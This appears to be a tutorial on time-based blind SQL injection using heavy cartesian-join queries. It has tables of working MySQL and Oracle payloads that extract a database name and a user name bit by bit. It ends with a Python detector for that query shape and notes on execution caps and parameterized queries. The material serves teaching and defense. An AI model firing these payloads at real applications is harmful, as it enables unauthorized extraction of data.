Time-Based Attack Using the Heavy Query Technique
※ Heavy Query Technique
An attack that asks the query to do expensive work so that the response is delayed.
' and (select case when 1=1 then (select count(*) from information_schema.schemata t1, information_schema.schemata t2, information_schema.schemata t3, information_schema.schemata t4, information_schema.schemata t5) else 1 end)=1#
When the condition is true, the subquery counts the rows of information_schema.schemata t1, information_schema.schemata t2, information_schema.schemata t3, information_schema.schemata t4, information_schema.schemata t5 (a cross join with no join condition), and because that work is heavy it takes a long time.
This is exactly the point we use: if a delay occurs the condition is true, otherwise it is false.
So when the condition is true, count(*)=1 is false, so '%' and false makes the whole query false and no posts are returned.
When the condition is false, the else branch gives '%' and 1=1, which is true, so the whole query is true and every post is returned.
※ TMI: from information_schema.schemata t1, information_schema.schemata t2
How does the count change each time a table is added?
The count of information_schema.schemata t1 is 10.
When information_schema.schemata t2 is added, the count jumps to 100.
Because the second copy adds its columns to the original columns, every row of the original data (10) is paired with every row of the original data (10) with no duplicate pairs, so the row count multiplies each time a copy is added.
#MYSQL
MySQL: DB name

| Payload | Result | Recovered value |
|---|---|---|
| ' and (select case when ascii(substring((select database()),1,1))&1=1 then (select count(*) from information_schema.schemata t1, information_schema.schemata t2, information_schema.schemata t3, information_schema.schemata t4, information_schema.schemata t5) else 1 end)=1# | normal output → 0 | DB: b□□□□ |
| ' and (select case when ascii(substring((select database()),1,1))&2=2 then (select count(*) from information_schema.schemata t1, information_schema.schemata t2, information_schema.schemata t3, information_schema.schemata t4, information_schema.schemata t5) else 1 end)=1# | delay → 1 | |
| ' and (select case when ascii(substring((select database()),1,1))&4=4 then (select count(*) from information_schema.schemata t1, information_schema.schemata t2, information_schema.schemata t3, information_schema.schemata t4, information_schema.schemata t5) else 1 end)=1# | normal output → 0 | |
| ' and (select case when ascii(substring((select database()),1,1))&8=8 then (select count(*) from information_schema.schemata t1, information_schema.schemata t2, information_schema.schemata t3, information_schema.schemata t4, information_schema.schemata t5) else 1 end)=1# | normal output → 0 | |
| ' and (select case when ascii(substring((select database()),1,1))&16=16 then (select count(*) from information_schema.schemata t1, information_schema.schemata t2, information_schema.schemata t3, information_schema.schemata t4, information_schema.schemata t5) else 1 end)=1# | normal output → 0 | |
| ' and (select case when ascii(substring((select database()),1,1))&32=32 then (select count(*) from information_schema.schemata t1, information_schema.schemata t2, information_schema.schemata t3, information_schema.schemata t4, information_schema.schemata t5) else 1 end)=1# | delay → 1 | |
| ' and (select case when ascii(substring((select database()),1,1))&64=64 then (select count(*) from information_schema.schemata t1, information_schema.schemata t2, information_schema.schemata t3, information_schema.schemata t4, information_schema.schemata t5) else 1 end)=1# | delay → 1 | |
| ' and (select case when ascii(substring((select database()),1,1))&128=128 then (select count(*) from information_schema.schemata t1, information_schema.schemata t2, information_schema.schemata t3, information_schema.schemata t4, information_schema.schemata t5) else 1 end)=1# | normal output → 0 | |
| 01100010 → 98 → 'b' | | |
| ... (omitted) | | |
| ' and (select case when ascii(substring((select database()),5,1))&1=1 then (select count(*) from information_schema.schemata t1, information_schema.schemata t2, information_schema.schemata t3, information_schema.schemata t4, information_schema.schemata t5) else 1 end)=1# | | DB: board |
#ORACLE
Oracle: user name

| Payload | Result | Recovered value |
|---|---|---|
| ' and (select case when BITAND(ascii(substr((select user from dual),1,1)),1)=1 then (select count(*) from all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) else 1 end from dual)=1-- | 1 | user: C□□□□□□□□□□□□□ |
| ' and (select case when BITAND(ascii(substr((select user from dual),1,1)),2)=2 then (select count(*) from all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) else 1 end from dual)=1-- | 1 | |
| ' and (select case when BITAND(ascii(substr((select user from dual),1,1)),4)=4 then (select count(*) from all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) else 1 end from dual)=1-- | 0 | |
| ' and (select case when BITAND(ascii(substr((select user from dual),1,1)),8)=8 then (select count(*) from all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) else 1 end from dual)=1-- | 0 | |
| ' and (select case when BITAND(ascii(substr((select user from dual),1,1)),16)=16 then (select count(*) from all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) else 1 end from dual)=1-- | 0 | |
| ' and (select case when BITAND(ascii(substr((select user from dual),1,1)),32)=32 then (select count(*) from all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) else 1 end from dual)=1-- | 0 | |
| ' and (select case when BITAND(ascii(substr((select user from dual),1,1)),64)=64 then (select count(*) from all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) else 1 end from dual)=1-- | 1 | |
| ' and (select case when BITAND(ascii(substr((select user from dual),1,1)),128)=128 then (select count(*) from all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) else 1 end from dual)=1-- | 0 | |
| 01000011 → 67 → 'C' | | |
| ... (omitted) | | |
| ' and (select case when BITAND(ascii(substr((select user from dual),14,1)),128)=128 then (select count(*) from all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) else 1 end from dual)=1-- | | user: C##CREHACKTIVE |
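As an added defender-side example (not code from the original post), the Python below scans SQL statements, such as those captured in a database general or audit log, for the shape used in the MySQL and Oracle tables above: a CASE WHEN bit test whose THEN branch is a COUNT(*) over the same catalog table comma-joined several times with no join condition. It estimates the cartesian cardinality the same way the TMI note does (10 rows x 10 rows = 100, and so on for each added copy). The row counts in CATALOG_ROWS, the ROW_THRESHOLD, and the sample queries are constructed assumptions for the demonstration; on a real instance the counts would be read from the catalog itself.

```python
import re
from typing import Dict, List, Tuple

# Assumed row counts for catalog tables that heavy-query payloads self-join.
# information_schema.schemata is set to 10 to match the count quoted in the post.
CATALOG_ROWS = {
    "information_schema.schemata": 10,
    "all_users": 40,
}

# Assumed budget: a cross product above this many rows is treated as heavy.
ROW_THRESHOLD = 100_000

# A comma-joined FROM list: everything after FROM up to WHERE, a closing paren, or the end.
FROM_LIST = re.compile(r"\bfrom\s+(.+?)(?=\bwhere\b|\)|$)", re.IGNORECASE | re.DOTALL)
# One entry of that list: "table" or "schema.table", optionally followed by an alias.
TABLE_REF = re.compile(
    r"^([A-Za-z_][\w$]*(?:\.[A-Za-z_][\w$]*)?)(?:\s+(?:as\s+)?[A-Za-z_]\w*)?$"
)
# The conditional wrapper seen in the post: CASE WHEN <bit test> THEN (SELECT COUNT(*) ...
CONDITIONAL_HEAVY = re.compile(
    r"\bcase\s+when\b.*?\bthen\s*\(\s*select\s+count\(\s*\*\s*\)", re.IGNORECASE | re.DOTALL
)


def from_lists(sql: str) -> List[List[str]]:
    """Return the lower-cased table names of every FROM list in the statement, subqueries included."""
    lists = []
    for m in FROM_LIST.finditer(sql):
        names = []
        for entry in m.group(1).split(","):
            ref = TABLE_REF.match(entry.strip())
            if ref:
                names.append(ref.group(1).lower())
        if names:
            lists.append(names)
    return lists


def estimate_rows(names: List[str]) -> int:
    """Cardinality of a comma join with no join condition: the product of the table row counts."""
    rows = 1
    for name in names:
        rows *= CATALOG_ROWS.get(name, 1)  # unknown tables contribute nothing to the estimate
    return rows


def analyze(sql: str) -> Dict[str, object]:
    """Score one statement for the heavy-query time-based pattern."""
    max_self_join = 0
    estimated_rows = 1
    for names in from_lists(sql):
        max_self_join = max(max_self_join, max(names.count(n) for n in set(names)))
        estimated_rows = max(estimated_rows, estimate_rows(names))
    conditional = CONDITIONAL_HEAVY.search(sql) is not None
    heavy = max_self_join >= 3 or estimated_rows >= ROW_THRESHOLD
    if heavy and conditional:
        severity = "high"      # heavy work gated by a condition: the timing-oracle shape
    elif heavy:
        severity = "medium"    # expensive cross join without a visible gating condition
    else:
        severity = "none"
    return {
        "max_self_join": max_self_join,
        "estimated_rows": estimated_rows,
        "conditional": conditional,
        "severity": severity,
    }


def scan(queries: List[str]) -> List[Tuple[str, Dict[str, object]]]:
    """Analyze every statement and pair it with its score."""
    return [(q, analyze(q)) for q in queries]


# Constructed sample log entries: one benign search, the two payload shapes from the post
# spliced into that search, and a legitimate two-way self-join that must not be flagged.
SAMPLE_QUERIES = [
    "select * from board where title like '%notice%'",
    "select * from board where title like '%' and (select case when ascii(substring((select database()),1,1))&2=2 "
    "then (select count(*) from information_schema.schemata t1, information_schema.schemata t2, "
    "information_schema.schemata t3, information_schema.schemata t4, information_schema.schemata t5) "
    "else 1 end)=1#%'",
    "select * from board where title like '%' and (select case when BITAND(ascii(substr((select user from dual),1,1)),1)=1 "
    "then (select count(*) from all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) "
    "else 1 end from dual)=1--%'",
    "select a.name from employees a, employees b where a.manager_id = b.id",
]

if __name__ == "__main__":
    for sql, result in scan(SAMPLE_QUERIES):
        print(f"{result['severity']:6} self_join={result['max_self_join']} "
              f"rows~{result['estimated_rows']} :: {sql[:60]}")
```

The score is a triage signal, not a blocker: the pattern-based detection only tells you the query shape is present. The delay itself is removed by capping per-statement execution time on the database side (for example MySQL's max_execution_time setting or Oracle Resource Manager limits), and the injection is prevented in the first place by parameterized queries, which keep the search term from ever becoming part of the FROM list.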